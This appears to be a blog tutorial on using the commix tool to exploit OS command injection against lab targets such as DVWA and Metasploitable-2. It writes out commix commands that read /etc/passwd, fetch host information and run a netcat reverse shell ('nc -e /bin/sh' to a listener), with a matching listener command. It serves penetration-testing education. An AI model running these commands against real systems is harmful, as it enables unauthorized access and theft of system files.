Hello Everyone, as everybody knows here what is command os injection and it’s consequences. We can perform it manually by checking parameter and try multiple payloads as well as we can try it automatically using different tools like burp suite, commix.

Here we are going to talk about tool name as commix (short for [comm]and [i]njection e[x]ploiter) which usually used by pentester to test command os injection automatically.

We can used commix which comes preinstall in many of penetration testing distros. or can download from github https://github.com/commixproject/commix In my case, I downloaded it from github.

python commix.py --help
To get help option of any tool

so for this demonstration you can use Metasoplitable-2 which include dvwa and Web_for_penetesters.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1"
In the above example we test commix tool on ip parameter with get request where we get shell

As we check in help of commix there are different options that we can use to perform different option.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --hostname
In the above example we pass an option –hostname to check the hostname and in result it shows “The hostname is debian”
In the above example that we pass –sys-info to get system information so likewise we can use others option too

If we want to read some sort of file which locate on vulnerable system/target then we also can easily read it.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --file-read=/etc/passwd
In the above example that we pass –file-read option with path and we are able to read file

If we want a reverse shell so we can usually do it using netcat, as well as we can also upload a php or python backdoor and execute it via using command.

python commix.py -u "http://192.168.43.58/commendexec/example1.php?ip=127.0.0.1" --os-cmd="nc -e /bin/sh 192.168.X.X 4444"
In the above example we run os command and give listener ip with port number

We need to listen via nc at specific port number to get shell.

nc -lvp 4444

For post request we need to give some more options like cookie and data parameters with their values. First we need to get values for that we can use any proxy tool. I used here burp proxy to capture request and got cookie as well as ip parameter.

In the above example just intercept the request
python commix.py -u "http://192.168.43.58/dvwa/vulnerabilities/exec/" --cookie="cookie value" --data="value"
In the above example we pass more data required in post case

LEAVE A REPLY

Please enter your comment!
Please enter your name here